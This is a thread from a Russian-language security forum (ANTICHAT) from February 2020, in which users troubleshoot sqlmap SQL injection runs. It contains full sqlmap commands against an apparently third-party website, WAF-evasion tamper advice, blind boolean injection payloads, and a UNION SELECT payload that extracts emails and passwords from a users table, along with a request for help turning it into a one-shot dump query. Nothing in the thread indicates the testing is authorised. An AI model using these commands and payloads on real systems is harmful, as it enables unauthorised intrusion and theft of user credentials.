ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

04.02.2020, 23:07
|
|
Guest
Сообщений: n/a
Провел на форуме: 734
Репутация:
0
|
|
Сообщение от norther
norther said:
↑
Приветствую!
Ковыряю одну скулю:
SqlMap последней версии
web application technology: Apache, Nginx
back-end DBMS operating system: Linux Debian
back-end DBMS: PostgreSQL
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
ПРОБЛЕМА:
При получении ответа на любой запрос постоянно на случайных позициях неправильно определяет символы! Например, получаю имя колонки "user_id", так SqlMap может один раз выдать "use?_id", в другой раз если повторить запрос выдаст ""uQer_id" или "uMe#_id" и т.д. Иногда вообще неотображаемые символы получаются и SqlMap на то ругается:
"cannot properly display (some) Unicode characters inside your terminal ('cp866') environment. All unhandled occurrences will result in replacement with '?' character. Please, find proper character representation inside corresponding output files"
" [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'"
--no-cast и --hex пробовал - не помогает.
Ответы сервера понятные и предсказуемые. Если подставляемое выражение = FALSE то возвращается пустая страница при TRUE возвращается с контентом
Что это может быть? Какие возможные решения данной проблемы?
на слепую скорее всего прога выдала ложный вывод , добавь в строку --banner --fresh-queries .
как вариант ,запустить через ТОР + верболзция=3 , смотреть на что ругается и символы корректировать
|
|
|
|

06.02.2020, 11:28
|
|
Guest
Сообщений: n/a
Провел на форуме: 2992
Репутация:
0
|
|
Люди добрые ,подскажите ввожу
sqlmap -u " https://www.domen.mx/top/?key=xol" --random-agent --tamper=space2comment --risk=3 --level=1 --threads=10 --dbs
получаю, имя бд
available databases [1]:
[*] bd_upgrade_live
далее ввожу
sqlmap -u " https://www.domen.mx/top/?key=xol" --random-agent --tamper=space2comment --threads=10 -D suplemen_upgrade_live -tables
таблица не выводит,пишет
[08:12:55] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: key (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: key=xol' AND 3094=3094 AND 'NPlU'='NPlU
---
[08:12:55] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[08:12:55] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
[08:12:55] [INFO] fetching tables for database: 'suplemen_upgrade_live'
[08:12:55] [INFO] fetching number of tables for database 'suplemen_upgrade_live'
[08:13:01] [INFO] retrieved:
[08:13:02] [WARNING] unexpected HTTP code '403' detected. Will use (extra) validation step in similar cases
[08:13:03] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[08:13:03] [WARNING] unable to retrieve the number of tables for database 'bd_upgrade_live'
[08:13:03] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] n
No tables found
[08:14:27] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 3 times
[08:14:27] [INFO] fetched data logged to text files under '/home/win/.sqlmap/output/ www.domen.mx'
[*] ending @ 08:14:27 /2020-02-06/
Обьясните пожалуйста почему так?
|
|
|
|

06.02.2020, 16:14
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Сообщение от hashfinderboss
hashfinderboss said:
↑
Люди добрые ,подскажите ввожу
sqlmap -u "
https://www.domen.mx/top/?key=xol
" --random-agent --tamper=space2comment --risk=3 --level=1 --threads=10 --dbs
получаю, имя бд
available databases [1]:[*] bd_upgrade_live
далее ввожу
sqlmap -u "
https://www.domen.mx/top/?key=xol
" --random-agent --tamper=space2comment --threads=10 -D suplemen_upgrade_live -tables
таблица не выводит,пишет
[08:12:55] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: key (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: key=xol' AND 3094=3094 AND 'NPlU'='NPlU
---
[08:12:55] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[08:12:55] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
[08:12:55] [INFO] fetching tables for database: 'suplemen_upgrade_live'
[08:12:55] [INFO] fetching number of tables for database 'suplemen_upgrade_live'
[08:13:01] [INFO] retrieved:
[08:13:02] [WARNING] unexpected HTTP code '403' detected. Will use (extra) validation step in similar cases
[08:13:03] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[08:13:03] [WARNING] unable to retrieve the number of tables for database 'bd_upgrade_live'
[08:13:03] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] n
No tables found
[08:14:27] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 3 times
[08:14:27] [INFO] fetched data logged to text files under '/home/win/.sqlmap/output/
www.domen.mx
'[*] ending @ 08:14:27 /2020-02-06/
Обьясните пожалуйста почему так?
Ну все логично, срабатывает какойто ваф, пробуйте крутить руками и смотреть на что срабатывает, и далее подбирайте/пишите нужный тампер
|
|
|

06.02.2020, 16:23
|
|
Guest
Сообщений: n/a
Провел на форуме: 9189
Репутация:
0
|
|
Скажите пожалуйста. Как правильно в GET запросе задать параметр мапу? Я задаю -p "параметр" а он по своему идёт
|
|
|
|

06.02.2020, 22:33
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
Сообщение от Andrey979
Andrey979 said:
↑
Скажите пожалуйста. Как правильно в GET запросе задать параметр мапу? Я задаю -p "параметр" а он по своему идёт
не может быть. Попробуйте поставить *
|
|
|
|

07.02.2020, 13:32
|
|
Guest
Сообщений: n/a
Провел на форуме: 9189
Репутация:
0
|
|
|
|
|
|

07.02.2020, 21:40
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
Ты спрашиваешь про одно, а в лугах (то что ты кинул) совсем другое. По поводу тамперов трудно сказать, надо руками тестить. Лучше руками крутить.
|
|
|
|

07.02.2020, 22:51
|
|
Guest
Сообщений: n/a
Провел на форуме: 9189
Репутация:
0
|
|
Сообщение от BabaDook
BabaDook said:
↑
Ты спрашиваешь про одно, а в лугах (то что ты кинул) совсем другое. По поводу тамперов трудно сказать, надо руками тестить. Лучше руками крутить.
У меня знаний в SQL нет, чтобы руками крутить. С мапом немного проще. Но также не знаю как с ним работать полностью. Ман бы на русском толковый как руками крутить
|
|
|
|

07.02.2020, 22:58
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
Сообщение от Andrey979
Andrey979 said:
↑
У меня знаний в SQL нет, чтобы руками крутить. С мапом немного проще. Но также не знаю как с ним работать полностью. Ман бы на русском толковый как руками крутить
В хроме переводчик есть а ещё есть поиск по форуму
|
|
|
|

09.02.2020, 01:10
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме: 4776
Репутация:
0
|
|
может кто то помочь , привести в виду DIOSa ?
5 UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x71626a6a71,IFNULL(CAST(email AS NCHAR),0x20),0x687971737978,IFNULL(CAST(password AS NCHAR),0x20),0x716b716b71) FROM base.users LIMIT 3,
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NUL
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL-- uBIi
хотя тут юнион , но при этом выводит 1 запись оч долго
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|